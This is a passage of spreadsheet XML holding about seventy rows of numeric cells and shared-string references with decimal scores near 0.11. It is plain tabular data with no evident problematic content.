        <v>30809.0</v>
      </c>
      <c r="B31300" s="2">
        <v>4.5288882E7</v>
      </c>
      <c r="C31300" s="2" t="s">
        <v>30101</v>
      </c>
      <c r="D31300" s="2">
        <v>1.0</v>
      </c>
      <c r="E31300" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31300" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31301" ht="15.75" customHeight="1">
      <c r="A31301" s="1">
        <v>30840.0</v>
      </c>
      <c r="B31301" s="2">
        <v>4568982.0</v>
      </c>
      <c r="C31301" s="2" t="s">
        <v>30102</v>
      </c>
      <c r="D31301" s="2">
        <v>1.0</v>
      </c>
      <c r="E31301" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31301" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31302" ht="15.75" customHeight="1">
      <c r="A31302" s="1">
        <v>31329.0</v>
      </c>
      <c r="B31302" s="2">
        <v>4973765.0</v>
      </c>
      <c r="C31302" s="2" t="s">
        <v>30103</v>
      </c>
      <c r="D31302" s="2">
        <v>1.0</v>
      </c>
      <c r="E31302" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31302" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31303" ht="15.75" customHeight="1">
      <c r="A31303" s="1">
        <v>31406.0</v>
      </c>
      <c r="B31303" s="2">
        <v>5.0058195E7</v>
      </c>
      <c r="C31303" s="2" t="s">
        <v>30104</v>
      </c>
      <c r="D31303" s="2">
        <v>1.0</v>
      </c>
      <c r="E31303" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31303" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31304" ht="15.75" customHeight="1">
      <c r="A31304" s="1">
        <v>31773.0</v>
      </c>
      <c r="B31304" s="2">
        <v>5219083.0</v>
      </c>
      <c r="C31304" s="2" t="s">
        <v>30105</v>
      </c>
      <c r="D31304" s="2">
        <v>1.0</v>
      </c>
      <c r="E31304" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31304" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31305" ht="15.75" customHeight="1">
      <c r="A31305" s="1">
        <v>31845.0</v>
      </c>
      <c r="B31305" s="2">
        <v>5273629.0</v>
      </c>
      <c r="C31305" s="2" t="s">
        <v>30106</v>
      </c>
      <c r="D31305" s="2">
        <v>1.0</v>
      </c>
      <c r="E31305" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31305" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31306" ht="15.75" customHeight="1">
      <c r="A31306" s="1">
        <v>31867.0</v>
      </c>
      <c r="B31306" s="2">
        <v>5285794.0</v>
      </c>
      <c r="C31306" s="2" t="s">
        <v>30107</v>
      </c>
      <c r="D31306" s="2">
        <v>1.0</v>
      </c>
      <c r="E31306" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31306" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31307" ht="15.75" customHeight="1">
      <c r="A31307" s="1">
        <v>32079.0</v>
      </c>
      <c r="B31307" s="2">
        <v>5386563.0</v>
      </c>
      <c r="C31307" s="2" t="s">
        <v>30108</v>
      </c>
      <c r="D31307" s="2">
        <v>1.0</v>
      </c>
      <c r="E31307" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31307" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31308" ht="15.75" customHeight="1">
      <c r="A31308" s="1">
        <v>32341.0</v>
      </c>
      <c r="B31308" s="2">
        <v>5591397.0</v>
      </c>
      <c r="C31308" s="2" t="s">
        <v>30109</v>
      </c>
      <c r="D31308" s="2">
        <v>1.0</v>
      </c>
      <c r="E31308" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31308" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31309" ht="15.75" customHeight="1">
      <c r="A31309" s="1">
        <v>32857.0</v>
      </c>
      <c r="B31309" s="2">
        <v>6269981.0</v>
      </c>
      <c r="C31309" s="2" t="s">
        <v>30110</v>
      </c>
      <c r="D31309" s="2">
        <v>1.0</v>
      </c>
      <c r="E31309" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31309" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31310" ht="15.75" customHeight="1">
      <c r="A31310" s="1">
        <v>32918.0</v>
      </c>
      <c r="B31310" s="2">
        <v>6417282.0</v>
      </c>
      <c r="C31310" s="2" t="s">
        <v>30111</v>
      </c>
      <c r="D31310" s="2">
        <v>1.0</v>
      </c>
      <c r="E31310" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31310" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31311" ht="15.75" customHeight="1">
      <c r="A31311" s="1">
        <v>33027.0</v>
      </c>
      <c r="B31311" s="2">
        <v>6688335.0</v>
      </c>
      <c r="C31311" s="2" t="s">
        <v>30112</v>
      </c>
      <c r="D31311" s="2">
        <v>1.0</v>
      </c>
      <c r="E31311" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31311" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31312" ht="15.75" customHeight="1">
      <c r="A31312" s="1">
        <v>33162.0</v>
      </c>
      <c r="B31312" s="2">
        <v>7086085.0</v>
      </c>
      <c r="C31312" s="2" t="s">
        <v>29718</v>
      </c>
      <c r="D31312" s="2">
        <v>1.0</v>
      </c>
      <c r="E31312" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31312" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31313" ht="15.75" customHeight="1">
      <c r="A31313" s="1">
        <v>33186.0</v>
      </c>
      <c r="B31313" s="2">
        <v>7125506.0</v>
      </c>
      <c r="C31313" s="2" t="s">
        <v>12406</v>
      </c>
      <c r="D31313" s="2">
        <v>1.0</v>
      </c>
      <c r="E31313" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31313" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31314" ht="15.75" customHeight="1">
      <c r="A31314" s="1">
        <v>33208.0</v>
      </c>
      <c r="B31314" s="2">
        <v>7199634.0</v>
      </c>
      <c r="C31314" s="2" t="s">
        <v>30070</v>
      </c>
      <c r="D31314" s="2">
        <v>1.0</v>
      </c>
      <c r="E31314" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31314" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31315" ht="15.75" customHeight="1">
      <c r="A31315" s="1">
        <v>33665.0</v>
      </c>
      <c r="B31315" s="2">
        <v>8415350.0</v>
      </c>
      <c r="C31315" s="2" t="s">
        <v>30113</v>
      </c>
      <c r="D31315" s="2">
        <v>1.0</v>
      </c>
      <c r="E31315" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31315" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31316" ht="15.75" customHeight="1">
      <c r="A31316" s="1">
        <v>33780.0</v>
      </c>
      <c r="B31316" s="2">
        <v>8720522.0</v>
      </c>
      <c r="C31316" s="2" t="s">
        <v>30114</v>
      </c>
      <c r="D31316" s="2">
        <v>1.0</v>
      </c>
      <c r="E31316" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31316" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31317" ht="15.75" customHeight="1">
      <c r="A31317" s="1">
        <v>34198.0</v>
      </c>
      <c r="B31317" s="2">
        <v>9987845.0</v>
      </c>
      <c r="C31317" s="2" t="s">
        <v>30115</v>
      </c>
      <c r="D31317" s="2">
        <v>1.0</v>
      </c>
      <c r="E31317" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31317" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31318" ht="15.75" customHeight="1">
      <c r="A31318" s="1">
        <v>34217.0</v>
      </c>
      <c r="B31318" s="2">
        <v>3.3673906E7</v>
      </c>
      <c r="C31318" s="2" t="s">
        <v>30116</v>
      </c>
      <c r="D31318" s="2">
        <v>1.0</v>
      </c>
      <c r="E31318" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31318" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="31319" ht="15.75" customHeight="1">
      <c r="A31319" s="1">
        <v>63.0</v>
      </c>
      <c r="B31319" s="2">
        <v>1.1234111E7</v>
      </c>
      <c r="C31319" s="2" t="s">
        <v>30117</v>
      </c>
      <c r="D31319" s="2">
        <v>1.0</v>
      </c>
      <c r="E31319" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31319" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="31320" ht="15.75" customHeight="1">
      <c r="A31320" s="1">
        <v>1338.0</v>
      </c>
      <c r="B31320" s="2">
        <v>2.5862069E7</v>
      </c>
      <c r="C31320" s="2" t="s">
        <v>30118</v>
      </c>
      <c r="D31320" s="2">
        <v>1.0</v>
      </c>
      <c r="E31320" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31320" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="31321" ht="15.75" customHeight="1">
      <c r="A31321" s="1">
        <v>3005.0</v>
      </c>
      <c r="B31321" s="2">
        <v>3.6336151E7</v>
      </c>
      <c r="C31321" s="2" t="s">
        <v>30119</v>
      </c>
      <c r="D31321" s="2">
        <v>1.0</v>
      </c>
      <c r="E31321" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31321" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="31322" ht="15.75" customHeight="1">
      <c r="A31322" s="1">
        <v>4308.0</v>
      </c>
      <c r="B31322" s="2">
        <v>4.1978167E7</v>
      </c>
      <c r="C31322" s="2" t="s">
        <v>30120</v>
      </c>
      <c r="D31322" s="2">
        <v>1.0</v>
      </c>
      <c r="E31322" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31322" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="31323" ht="15.75" customHeight="1">
      <c r="A31323" s="1">
        <v>5828.0</v>
      </c>
      <c r="B31323" s="2">
        <v>4.6893731E7</v>
      </c>
      <c r="C31323" s="2" t="s">
        <v>30121</v>
      </c>
      <c r="D31323" s="2">
        <v>1.0</v>
      </c>
      <c r="E31323" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31323" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="31324" ht="15.75" customHeight="1">
      <c r="A31324" s="1">
        <v>6068.0</v>
      </c>
      <c r="B31324" s="2">
        <v>4.7623346E7</v>
      </c>
      <c r="C31324" s="2" t="s">
        <v>30122</v>
      </c>
      <c r="D31324" s="2">
        <v>1.0</v>
      </c>
      <c r="E31324" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31324" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="31325" ht="15.75" customHeight="1">
      <c r="A31325" s="1">
        <v>7892.0</v>
      </c>
      <c r="B31325" s="2">
        <v>5.2442677E7</v>
      </c>
      <c r="C31325" s="2" t="s">
        <v>30123</v>
      </c>
      <c r="D31325" s="2">
        <v>1.0</v>
      </c>
      <c r="E31325" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31325" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="31326" ht="15.75" customHeight="1">
      <c r="A31326" s="1">
        <v>8448.0</v>
      </c>
      <c r="B31326" s="2">
        <v>5.3964412E7</v>
      </c>
      <c r="C31326" s="2" t="s">
        <v>30124</v>
      </c>
      <c r="D31326" s="2">
        <v>1.0</v>
      </c>
      <c r="E31326" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31326" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="31327" ht="15.75" customHeight="1">
      <c r="A31327" s="1">
        <v>9039.0</v>
      </c>
      <c r="B31327" s="2">
        <v>5.5052426E7</v>
      </c>
      <c r="C31327" s="2" t="s">
        <v>30125</v>
      </c>
      <c r="D31327" s="2">
        <v>1.0</v>
      </c>
      <c r="E31327" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31327" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="31328" ht="15.75" customHeight="1">
      <c r="A31328" s="1">
        <v>9680.0</v>
      </c>
      <c r="B31328" s="2">
        <v>5.6326753E7</v>
      </c>
      <c r="C31328" s="2" t="s">
        <v>30126</v>
      </c>
      <c r="D31328" s="2">
        <v>1.0</v>
      </c>
      <c r="E31328" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31328" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="31329" ht="15.75" customHeight="1">
      <c r="A31329" s="1">
        <v>12503.0</v>
      </c>
      <c r="B31329" s="2">
        <v>2.9638773E7</v>
      </c>
      <c r="C31329" s="2" t="s">
        <v>30127</v>
      </c>
      <c r="D31329" s="2">
        <v>1.0</v>
      </c>
      <c r="E31329" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31329" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="31330" ht="15.75" customHeight="1">
      <c r="A31330" s="1">
        <v>17235.0</v>
      </c>
      <c r="B31330" s="2">
        <v>4.907387E7</v>
      </c>
      <c r="C31330" s="2" t="s">
        <v>30128</v>
      </c>
      <c r="D31330" s="2">
        <v>1.0</v>
      </c>
      <c r="E31330" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31330" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="31331" ht="15.75" customHeight="1">
      <c r="A31331" s="1">
        <v>17697.0</v>
      </c>
      <c r="B31331" s="2">
        <v>5.0553076E7</v>
      </c>
      <c r="C31331" s="2" t="s">
        <v>30129</v>
      </c>
      <c r="D31331" s="2">
        <v>1.0</v>
      </c>
      <c r="E31331" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31331" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="31332" ht="15.75" customHeight="1">
      <c r="A31332" s="1">
        <v>18127.0</v>
      </c>
      <c r="B31332" s="2">
        <v>5.1788197E7</v>
      </c>
      <c r="C31332" s="2" t="s">
        <v>30130</v>
      </c>
      <c r="D31332" s="2">
        <v>1.0</v>
      </c>
      <c r="E31332" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31332" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="31333" ht="15.75" customHeight="1">
      <c r="A31333" s="1">
        <v>22312.0</v>
      </c>
      <c r="B31333" s="2">
        <v>3.3875591E7</v>
      </c>
      <c r="C31333" s="2" t="s">
        <v>30131</v>
      </c>
      <c r="D31333" s="2">
        <v>1.0</v>
      </c>
      <c r="E31333" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31333" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="31334" ht="15.75" customHeight="1">
      <c r="A31334" s="1">
        <v>22366.0</v>
      </c>
      <c r="B31334" s="2">
        <v>3.4928329E7</v>
      </c>
      <c r="C31334" s="2" t="s">
        <v>30132</v>
      </c>
      <c r="D31334" s="2">
        <v>1.0</v>
      </c>
      <c r="E31334" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31334" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="31335" ht="15.75" customHeight="1">
      <c r="A31335" s="1">
        <v>23324.0</v>
      </c>
      <c r="B31335" s="2">
        <v>5.4456653E7</v>
      </c>
      <c r="C31335" s="2" t="s">
        <v>30133</v>
      </c>
      <c r="D31335" s="2">
        <v>1.0</v>
      </c>
      <c r="E31335" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31335" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="31336" ht="15.75" customHeight="1">
      <c r="A31336" s="1">
        <v>25463.0</v>
      </c>
      <c r="B31336" s="2">
        <v>1.3985905E7</v>
      </c>
      <c r="C31336" s="2" t="s">
        <v>30134</v>
      </c>
      <c r="D31336" s="2">
        <v>1.0</v>
      </c>
      <c r="E31336" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31336" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="31337" ht="15.75" customHeight="1">
      <c r="A31337" s="1">
        <v>28563.0</v>
      </c>
      <c r="B31337" s="2">
        <v>2.6914435E7</v>
      </c>
      <c r="C31337" s="2" t="s">
        <v>29882</v>
      </c>
      <c r="D31337" s="2">
        <v>1.0</v>
      </c>
      <c r="E31337" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31337" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="31338" ht="15.75" customHeight="1">
      <c r="A31338" s="1">
        <v>25536.0</v>
      </c>
      <c r="B31338" s="2">
        <v>1.4243445E7</v>
      </c>
      <c r="C31338" s="2" t="s">
        <v>30135</v>
      </c>
      <c r="D31338" s="2">
        <v>1.0</v>
      </c>
      <c r="E31338" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31338" s="2">
        <v>0.110082304526749</v>
      </c>
    </row>
    <row r="31339" ht="15.75" customHeight="1">
      <c r="A31339" s="1">
        <v>153.0</v>
      </c>
      <c r="B31339" s="2">
        <v>1.3689486E7</v>
      </c>
      <c r="C31339" s="2" t="s">
        <v>30136</v>
      </c>
      <c r="D31339" s="2">
        <v>1.0</v>
      </c>
      <c r="E31339" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31339" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="31340" ht="15.75" customHeight="1">
      <c r="A31340" s="1">
        <v>2717.0</v>
      </c>
      <c r="B31340" s="2">
        <v>3.4933066E7</v>
      </c>
      <c r="C31340" s="2" t="s">
        <v>30137</v>
      </c>
      <c r="D31340" s="2">
        <v>1.0</v>
      </c>
      <c r="E31340" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31340" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="31341" ht="15.75" customHeight="1">
      <c r="A31341" s="1">
        <v>3048.0</v>
      </c>
      <c r="B31341" s="2">
        <v>3.6506077E7</v>
      </c>
      <c r="C31341" s="2" t="s">
        <v>30138</v>
      </c>
      <c r="D31341" s="2">
        <v>1.0</v>
      </c>
      <c r="E31341" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31341" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="31342" ht="15.75" customHeight="1">
      <c r="A31342" s="1">
        <v>5374.0</v>
      </c>
      <c r="B31342" s="2">
        <v>4.5397319E7</v>
      </c>
      <c r="C31342" s="2" t="s">
        <v>30139</v>
      </c>
      <c r="D31342" s="2">
        <v>1.0</v>
      </c>
      <c r="E31342" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31342" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="31343" ht="15.75" customHeight="1">
      <c r="A31343" s="1">
        <v>9974.0</v>
      </c>
      <c r="B31343" s="2">
        <v>5.6943467E7</v>
      </c>
      <c r="C31343" s="2" t="s">
        <v>30140</v>
      </c>
      <c r="D31343" s="2">
        <v>1.0</v>
      </c>
      <c r="E31343" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31343" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="31344" ht="15.75" customHeight="1">
      <c r="A31344" s="1">
        <v>10611.0</v>
      </c>
      <c r="B31344" s="2">
        <v>1.372033E7</v>
      </c>
      <c r="C31344" s="2" t="s">
        <v>30141</v>
      </c>
      <c r="D31344" s="2">
        <v>1.0</v>
      </c>
      <c r="E31344" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31344" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="31345" ht="15.75" customHeight="1">
      <c r="A31345" s="1">
        <v>10773.0</v>
      </c>
      <c r="B31345" s="2">
        <v>1.5610481E7</v>
      </c>
      <c r="C31345" s="2" t="s">
        <v>30142</v>
      </c>
      <c r="D31345" s="2">
        <v>1.0</v>
      </c>
      <c r="E31345" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31345" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="31346" ht="15.75" customHeight="1">
      <c r="A31346" s="1">
        <v>16712.0</v>
      </c>
      <c r="B31346" s="2">
        <v>4.7425833E7</v>
      </c>
      <c r="C31346" s="2" t="s">
        <v>30143</v>
      </c>
      <c r="D31346" s="2">
        <v>1.0</v>
      </c>
      <c r="E31346" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31346" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="31347" ht="15.75" customHeight="1">
      <c r="A31347" s="1">
        <v>19294.0</v>
      </c>
      <c r="B31347" s="2">
        <v>5.5188476E7</v>
      </c>
      <c r="C31347" s="2" t="s">
        <v>30144</v>
      </c>
      <c r="D31347" s="2">
        <v>1.0</v>
      </c>
      <c r="E31347" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31347" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="31348" ht="15.75" customHeight="1">
      <c r="A31348" s="1">
        <v>27355.0</v>
      </c>
      <c r="B31348" s="2">
        <v>2.1582856E7</v>
      </c>
      <c r="C31348" s="2" t="s">
        <v>30145</v>
      </c>
      <c r="D31348" s="2">
        <v>1.0</v>
      </c>
      <c r="E31348" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31348" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="31349" ht="15.75" customHeight="1">
      <c r="A31349" s="1">
        <v>30264.0</v>
      </c>
      <c r="B31349" s="2">
        <v>3.765069E7</v>
      </c>
      <c r="C31349" s="2" t="s">
        <v>30146</v>
      </c>
      <c r="D31349" s="2">
        <v>1.0</v>
      </c>
      <c r="E31349" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31349" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="31350" ht="15.75" customHeight="1">
      <c r="A31350" s="1">
        <v>2851.0</v>
      </c>
      <c r="B31350" s="2">
        <v>3.5498973E7</v>
      </c>
      <c r="C31350" s="2" t="s">
        <v>30147</v>
      </c>
      <c r="D31350" s="2">
        <v>1.0</v>
      </c>
      <c r="E31350" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31350" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="31351" ht="15.75" customHeight="1">
      <c r="A31351" s="1">
        <v>10552.0</v>
      </c>
      <c r="B31351" s="2">
        <v>1.2667183E7</v>
      </c>
      <c r="C31351" s="2" t="s">
        <v>30148</v>
      </c>
      <c r="D31351" s="2">
        <v>1.0</v>
      </c>
      <c r="E31351" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31351" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="31352" ht="15.75" customHeight="1">
      <c r="A31352" s="1">
        <v>13319.0</v>
      </c>
      <c r="B31352" s="2">
        <v>3.4594261E7</v>
      </c>
      <c r="C31352" s="2" t="s">
        <v>30149</v>
      </c>
      <c r="D31352" s="2">
        <v>1.0</v>
      </c>
      <c r="E31352" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31352" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="31353" ht="15.75" customHeight="1">
      <c r="A31353" s="1">
        <v>13594.0</v>
      </c>
      <c r="B31353" s="2">
        <v>3.5775252E7</v>
      </c>
      <c r="C31353" s="2" t="s">
        <v>30150</v>
      </c>
      <c r="D31353" s="2">
        <v>1.0</v>
      </c>
      <c r="E31353" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31353" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="31354" ht="15.75" customHeight="1">
      <c r="A31354" s="1">
        <v>14799.0</v>
      </c>
      <c r="B31354" s="2">
        <v>4.0922281E7</v>
      </c>
      <c r="C31354" s="2" t="s">
        <v>30151</v>
      </c>
      <c r="D31354" s="2">
        <v>1.0</v>
      </c>
      <c r="E31354" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31354" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="31355" ht="15.75" customHeight="1">
      <c r="A31355" s="1">
        <v>28390.0</v>
      </c>
      <c r="B31355" s="2">
        <v>2.6165031E7</v>
      </c>
      <c r="C31355" s="2" t="s">
        <v>30152</v>
      </c>
      <c r="D31355" s="2">
        <v>1.0</v>
      </c>
      <c r="E31355" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31355" s="2">
        <v>0.110042735042735</v>
      </c>
    </row>
    <row r="31356" ht="15.75" customHeight="1">
      <c r="A31356" s="1">
        <v>6823.0</v>
      </c>
      <c r="B31356" s="2">
        <v>4.9581708E7</v>
      </c>
      <c r="C31356" s="2" t="s">
        <v>30153</v>
      </c>
      <c r="D31356" s="2">
        <v>1.0</v>
      </c>
      <c r="E31356" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31356" s="2">
        <v>0.1087301587301587</v>
      </c>
    </row>
    <row r="31357" ht="15.75" customHeight="1">
      <c r="A31357" s="1">
        <v>11119.0</v>
      </c>
      <c r="B31357" s="2">
        <v>1.8934943E7</v>
      </c>
      <c r="C31357" s="2" t="s">
        <v>30154</v>
      </c>
      <c r="D31357" s="2">
        <v>1.0</v>
      </c>
      <c r="E31357" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31357" s="2">
        <v>0.1086601307189543</v>
      </c>
    </row>
    <row r="31358" ht="15.75" customHeight="1">
      <c r="A31358" s="1">
        <v>12452.0</v>
      </c>
      <c r="B31358" s="2">
        <v>2.9338406E7</v>
      </c>
      <c r="C31358" s="2" t="s">
        <v>30155</v>
      </c>
      <c r="D31358" s="2">
        <v>1.0</v>
      </c>
      <c r="E31358" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31358" s="2">
        <v>0.1085858585858586</v>
      </c>
    </row>
    <row r="31359" ht="15.75" customHeight="1">
      <c r="A31359" s="1">
        <v>33014.0</v>
      </c>
      <c r="B31359" s="2">
        <v>6650387.0</v>
      </c>
      <c r="C31359" s="2" t="s">
        <v>30156</v>
      </c>
      <c r="D31359" s="2">
        <v>1.0</v>
      </c>
      <c r="E31359" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31359" s="2">
        <v>0.1085069444444444</v>
      </c>
    </row>
    <row r="31360" ht="15.75" customHeight="1">
      <c r="A31360" s="1">
        <v>6643.0</v>
      </c>
      <c r="B31360" s="2">
        <v>4.9080961E7</v>
      </c>
      <c r="C31360" s="2" t="s">
        <v>30157</v>
      </c>
      <c r="D31360" s="2">
        <v>1.0</v>
      </c>
      <c r="E31360" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31360" s="2">
        <v>0.1083788706739526</v>
      </c>
    </row>
    <row r="31361" ht="15.75" customHeight="1">
      <c r="A31361" s="1">
        <v>17928.0</v>
      </c>
      <c r="B31361" s="2">
        <v>5.119029E7</v>
      </c>
      <c r="C31361" s="2" t="s">
        <v>30158</v>
      </c>
      <c r="D31361" s="2">
        <v>1.0</v>
      </c>
      <c r="E31361" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31361" s="2">
        <v>0.1083788706739526</v>
      </c>
    </row>
    <row r="31362" ht="15.75" customHeight="1">
      <c r="A31362" s="1">
        <v>24611.0</v>
      </c>
      <c r="B31362" s="2">
        <v>1.1435929E7</v>
      </c>
      <c r="C31362" s="2" t="s">
        <v>30159</v>
      </c>
      <c r="D31362" s="2">
        <v>1.0</v>
      </c>
      <c r="E31362" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31362" s="2">
        <v>0.1083788706739526</v>
      </c>
    </row>
    <row r="31363" ht="15.75" customHeight="1">
      <c r="A31363" s="1">
        <v>2556.0</v>
      </c>
      <c r="B31363" s="2">
        <v>3.4189199E7</v>
      </c>
      <c r="C31363" s="2" t="s">
        <v>30160</v>
      </c>
      <c r="D31363" s="2">
        <v>1.0</v>
      </c>
      <c r="E31363" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31363" s="2">
        <v>0.1083333333333333</v>
      </c>
    </row>
    <row r="31364" ht="15.75" customHeight="1">
      <c r="A31364" s="1">
        <v>8766.0</v>
      </c>
      <c r="B31364" s="2">
        <v>5.4583818E7</v>
      </c>
      <c r="C31364" s="2" t="s">
        <v>30161</v>
      </c>
      <c r="D31364" s="2">
        <v>1.0</v>
      </c>
      <c r="E31364" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31364" s="2">
        <v>0.1083333333333333</v>
      </c>
    </row>
    <row r="31365" ht="15.75" customHeight="1">
      <c r="A31365" s="1">
        <v>17205.0</v>
      </c>
      <c r="B31365" s="2">
        <v>4.9037054E7</v>
      </c>
      <c r="C31365" s="2" t="s">
        <v>30162</v>
      </c>
      <c r="D31365" s="2">
        <v>1.0</v>
      </c>
      <c r="E31365" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31365" s="2">
        <v>0.1083333333333333</v>
      </c>
    </row>
    <row r="31366" ht="15.75" customHeight="1">
      <c r="A31366" s="1">
        <v>25193.0</v>
      </c>
      <c r="B31366" s="2">
        <v>1.3196E7</v>
      </c>
      <c r="C31366" s="2" t="s">
        <v>30163</v>
      </c>
      <c r="D31366" s="2">
        <v>1.0</v>
      </c>
      <c r="E31366" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31366" s="2">
        <v>0.1083333333333333</v>
      </c>
    </row>
    <row r="31367" ht="15.75" customHeight="1">
      <c r="A31367" s="1">
        <v>26985.0</v>
      </c>
      <c r="B31367" s="2">
